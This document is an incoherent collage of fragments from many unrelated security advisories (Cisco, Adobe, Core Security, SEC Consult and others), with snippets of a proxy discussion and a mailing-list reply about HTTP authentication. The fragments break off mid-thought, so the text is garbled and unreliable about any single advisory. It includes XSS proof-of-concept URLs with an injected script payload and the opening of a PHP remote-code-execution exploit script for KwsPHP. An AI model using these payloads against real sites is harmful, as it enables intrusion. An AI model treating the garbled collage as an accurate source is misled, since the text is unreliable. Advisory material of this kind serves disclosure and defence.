HTTP request
RESOLUTION
The vulnerability can be resolved by the following procedure:
Disable the array's HTTP and HTTPS network management services (Note: This will also disable all management access from a Web browser. Array management access may be maintained via Command Line Interface [CLI].) Use the instructions outlined in the Workaround section below to disable the HTTP and HTTPS network management services.
Install TS230P008 firmware as soon as possible. If the HTTP and HTTPS network management services have been previously disabled, the services may be re-enabled as the issue is fully resolved in TS230P008 firmware.
TS230P008 firmware installation and workaround instructions:
Multiple Adobe Products
XML External Entity And XML Injection Vulnerabilities
CVE: CVE-2009-3960
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html
Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
+-----------+
|Description|
+-----------+
Advisory: Geo++(R) GNCASTER: Faulty implementation of HTTP Digest
Authentication
During a penetration test, RedTeam Pentesting discovered that the
GNCaster software has multiple bugs in its implementation of HTTP Digest
Authentication.
Details
=======
Title: CA20090429-01: CA ARCserve Backup Apache HTTP Server
Multiple Vulnerabilities
CA Advisory Reference: CA20090429-01
CA Advisory Date: 2009-04-29
title: Proxy bypass vulnerability & plain text passwords
in LevelOne AMG-2000
product: LevelOne AMG-2000 Wireless AP Management Gateway
vulnerable version: Firmware <=2.00.00build00600
impact: critical
homepage: http://www.level1.com
found: 2008-12-16
by: J. Greil / SEC Consult / www.sec-consult.com
=======================================================================
Vendor description:
BugSec | Security Advisory
Moshe Ben-Abu | Security Expert
Advisory URL (PDF):
http://www.bugsec.com/up_files/OpenNMS_Multiple_Vulnerabilities.pdf
- Table of Contents -
OPENNMS MULTIPLE VULNERABILITIES
Cisco Security Advisory: Vulnerability in Cisco IOS While Processing
SSL Packet
Advisory ID: cisco-sa-20080924-ssl
http://www.cisco.com/warp/public/707/cisco-sa-20080924-ssl.shtml
Revision 1.0
For Public Release 2008 September 24 1600 UTC (GMT)
Rapid7 Advisory R7-0033
Apache HTTP Server mod_proxy_ftp Wildcard Characters Cross-Site Scripting
Discovered: July 25, 2008
Published: August 5, 2008
Revision: 1.1
http://www.rapid7.com/advisories/R7-0033
CVE: CVE-2008-2939
Document ID: 105444
Advisory ID: cisco-sa-20080604-asa
http://www.cisco.com/warp/public/707/cisco-sa-20080604-asa.shtml
Revision 1.0
For Public Release 2008 June 04 1600 UTC (GMT)
issue is different from CAN-2003-0389 and CVE-2005-3329.
Simple XSS Proof of Concept (PoC) URLs:
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test
https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22
The injected payload in the previous examples is:
#######################################################################
Luigi Auriemma
Application: 3S CoDeSys
http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions: <= 3.4 SP4 Patch 2
Platforms: Windows
Bugs: A] GatewayService integer overflow
B] CmpWebServer stack overflow
C] CmpWebServer Content-Length NULL pointer
#######################################################################
Luigi Auriemma
Application: Serv-U (FTP)
http://www.serv-u.com
Versions: <= 11.1.0.3
Platforms: Windows, Linux
bug B should affect only some Windows versions
Bugs: A] sockets and ports consumption
B] possible access to the management console
===============================================================================
Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-84.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Apple CUPS IPP_TAG_UNSUPPORTED Handling null pointer Vulnerability
Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver,
Yaws and Boa log escape sequence injection
Name Nginx, Varnish, Cherokee, thttpd, mini-httpd,
WEBrick, Orion, AOLserver, Yaws and Boa log escape
sequence injection
Systems Affected nginx 0.7.64
Varnish 2.0.6
Cherokee 0.99.30
mini_httpd 1.19
Document ID: 111014
Advisory ID: cisco-sa-20100526-mediator
http://www.cisco.com/warp/public/707/cisco-sa-20100526-mediator.shtml
Revision 1.0
For Public Release 2010 May 26 1600 UTC (GMT)
<?php
/*
---KwsPHP All Version / Remote Code Execution---
Vulnerability Discovered By TsukasaGenesis && Ajax
Sploit Coded By Ajax Site: http://www.r57shell.in
*/
// Print the usage banner and stop when too few command-line arguments are given.
if($argc<9){
print "---KwsPHP All Version / Remote Code Execution---\n\n";
print "usage: kwsphpsploit.php -url <url> -login <login> -pass <pass> -email <email> -file <file> [-id <id>]\n\n";
print "Url url of KwsPHP script : Ex : www.example.com/kwsphp/\n";
exit(1);
}
MSA01240108:
IE7 allows overwriting of several headers leading to Http
request Splitting and smuggling.
Date: March 21st, 2008
Tested Versions:
Internet Explorer 7.0.5730.11
Tested OS:
Cisco IOS SSL VPN Vulnerability
Advisory ID: cisco-sa-20100922-sslvpn
http://www.cisco.com/warp/public/707/cisco-sa-20100922-sslvpn.shtml
Revision 1.0
For Public Release 2010 September 22 1600 UTC (GMT)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - Corelabs Advisory
http://corelabs.coresecurity.com/
Oracle GlassFish Server Administration Console Authentication Bypass
1. *Advisory Information*
Previous, unsupported versions may be affected
Additionally, these vulnerabilities only occur when all of the following
are true:
a) untrusted web applications are being used
b) the SecurityManager is used to limit the untrusted web applications
c) the HTTP NIO or HTTP APR connector is used
d) sendfile is enabled for the connector (this is the default)
Description:
Tomcat provides support for sendfile with the HTTP NIO and HTTP APR
connectors. sendfile is used automatically for content served via the
To be clear, the CONNECT request is a single request/response cycle between the client and the proxy. Any request body is nonsensical and should be ignored by the proxy (or the request can be rejected if the proxy wants to be pedantic). There is nothing that explicitly disallows inclusion of the host header in a CONNECT request. Granted, including the host header incurs some degree of ambiguity (the FQDN may resolve to the IP address, but the IP address is not guaranteed to resolve to the FQDN), but this is clearly a debatable choice on the developer's part as to whether it should be used to determine traffic policy applicability for this request.
The proxy should only ignore further data between the client and remote if the proxy successfully established a TCP connection between them on the specified destination port.
IOW, if the client sends a CONNECT request that the proxy policy allows, the proxy should either queue or reject further communication from the client until the TCP connection has been successfully established and the proxy has responded to the client with "HTTP 200".
If the connection attempt fails, the proxy should provide an HTTP error response to the client and close the client-to-proxy connection.
Likewise, while the proxy does establish the end-to-end TCP connection between the client and upstream server, it is not responsible for any part of the encryption that may be involved in that communication - unless it specifically offers a "trusted MitM" feature such as TMG HTTPS Inspection or Juniper SSL Forward Proxy (other vendors have similar features).
Also, whether the McAfee proxy allows translating normal HTTP methods to CONNECT, then tunneling them to the upstream proxy is irrelevant to the question of whether the local proxy actually uses the host header or the host portion of the CONNECT request to determine policy applicability.
===== Description =====
Multiple XSS vulnerabilities found in the DCP-Portal.
1. common/components/editor/insert_image.php, modules/newsletter/insert_image.php, php/editor.php
The variable $upload_failure_report takes user input from the HTTP GET request variable "Image" when the deletion of an uploaded file fails. This variable is later output to the page without proper sanitization.
2. modules/gallery/view_img.php
The page title can be modified through the HTTP request variable "imgtitle". Since no sanitizer is applied, an XSS occurs on line 2.
Another vulnerability exists when magic quotes is turned off: the HTTP request variable "imagename" is output inside the JavaScript document.write call, between single quotes, on line 27.
SecureWorks Security Advisory SWRX-2010-001
Cisco ASA HTTP Response Splitting Vulnerability
Advisory Information
Title: Cisco ASA HTTP Response Splitting Vulnerability
Advisory ID: SWRX-2010-001
Advisory URL: http://www.secureworks.com/ctu/advisories/SWRX-2010-001
Date published: Thursday, June 24, 2010
CVE: CVE-2008-7257
Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Chrome Password Manager Cross Origin Weakness
Release Date: 2010-02-15
Tim,
Great writeup of the state of the union for Web-based authentication methods.
As you mention, your paper is primarily an argument for fixing HTTP
auth. That might make a better title for it, in fact, since that does
seem to be the primary thrust of the arguments presented. Or at least,
"If We Wean the Web Off of Session Cookies, This Is Some of What We'd
Have to do". I wasn't convinced at all that Weaning the Web Off of
Session Cookies was the logical conclusion of the data you presented.
On Thu, Jan 28, 2010 at 2:03 PM, James Landis <jcl24@cornell.edu> wrote:
> Tim,
> Great writeup of the state of the union for Web-based authentication methods.
>
> As you mention, your paper is primarily an argument for fixing HTTP
> auth. That might make a better title for it, in fact, since that does
> seem to be the primary thrust of the arguments presented. Or at least,
> "If We Wean the Web Off of Session Cookies, This Is Some of What We'd
> Have to do". I wasn't convinced at all that Weaning the Web Off of
> Session Cookies was the logical conclusion of the data you presented.